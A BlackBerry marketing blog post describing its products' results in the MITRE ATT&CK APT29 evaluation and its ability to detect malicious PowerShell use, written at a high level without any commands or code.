MITRE ATT&CK Framework: Taking the Power Out of PowerShell

The MITRE ATT&CK® framework is a global knowledge base of threat actors’ tactics and techniques drawn from real-world cyber-attacks. As such, it highlights potential attack vectors and uniformly describes the “how” and “why” of a threat actor’s actions. MITRE provides a common knowledge base and verbiage for describing attacks, ultimately benefiting end users by organizing complex information into an understandable and actionable format.

BlackBerry recently participated in the MITRE ATT&CK APT29 evaluation where BlackBerry® Protect, BlackBerry® Optics, and BlackBerry® Guard were tested against the attack strategies of APT29, a threat group reportedly tied to the Russian government. BlackBerry excelled throughout these tests (see the results). One of the areas where BlackBerry performed exceptionally well was in regard to the visibility provided into one of the attacker’s favorite tools – PowerShell.

In the past, PowerShell based attacks were reserved for the realm of the truly hardcore, like APTs and advanced hacking groups. As antivirus gets more and more effective, threat actors of all shapes and sizes are looking for the next path of least resistance and, as it turns out, that path likely involves lots of PowerShell. APTs paved the way for these types of attacks by demonstrating success, and now everyone from the script kiddies on up are following suit.

Why APTs Leverage PowerShell

PowerShell is a highly effective attack vector for a few reasons: it can be found on every modern Windows OS, it’s an extremely powerful and capable tool, and it is well documented, which benefits both attackers and defenders alike.

Because of the availability and documentation, it should be an easy win for endpoint vendors to instrument PowerShell in order to alert and stop a malicious actor when they try to do something weird. But there is a catch that trips up many solutions: there are several entry points to PowerShell, and you have to understand each one to effectively address it as an attack vector.

It’s not sufficient to simply rely on command line arguments for example. You have to be able to see what’s going on inside the file PowerShell is attempting to execute, what the content of the file is that it’s trying to extract, and the modules it’s trying to run.

Figure 1: Full telemetry for PowerShell enumerating system information.

Taking the Power Out of PowerShell

What we have developed in BlackBerry® Optics is the ability to inspect PowerShell regardless of how it is invoked. At the end of the day, this allows users to query for different types of activity, see it retroactively, and receive alerts in real time to take response actions. BlackBerry Optics detects PowerShell trying to download a file. And - boom! - kills it. Trying to decode an encrypted payload? Boom! Kills it.

An interesting factor that was highlighted in Josh Zelonis’s analysis of the MITRE APT29 ATT&CK evaluation is this is apparently difficult for nearly every endpoint vendor to implement in practice. He dubs these issues “Powerfails.” Fileless attacks need to be prevented, but many of the leading EDR/EPP solutions don’t have adequate visibility in real world situations, as demonstrated empirically by MITRE and Mr. Zelonis’ analysis.

Figure 2: A chart representing Josh Zelonis's 'Powerfails' analysis. (NOTE: Cylance was acquired by BlackBerry in 2019.)

Takeaways

We will likely see many threat actors move away from relying on these pre-built frameworks, by invoking PowerShell manually or utilizing other living off the land techniques that utilize PowerShell. You may think you’re safe, but without proper visibility you aren’t. You might be looking at how PS is being spawned, but not actually inside of it to see what it is doing - which is where the true threat lies.

Most vendors are good at specific usages of PowerShell like you may find in PowerView or Empire, since detection of these techniques function basically like an antivirus signature. BlackBerry Optics is one of the only solutions that provides thorough visibility regardless of entry point or framework in use.

BlackBerry performed extraordinarily well in terms of number of detections, far surpassing traditional EDR players. The MITRE ATT&CK APT29 evaluation clearly demonstrated that our solutions protect systems from attack strategies used by world-class threat actors. Our mapping to threat techniques and tactics is robust and our balanced approach between automation and manual interaction is effective.

For full results of the evaluation, please visit the MITRE page. MITRE does not offer interpretation or analysis of results, but we are happy to discuss our performance and answer any questions. Please contact us with your inquiries.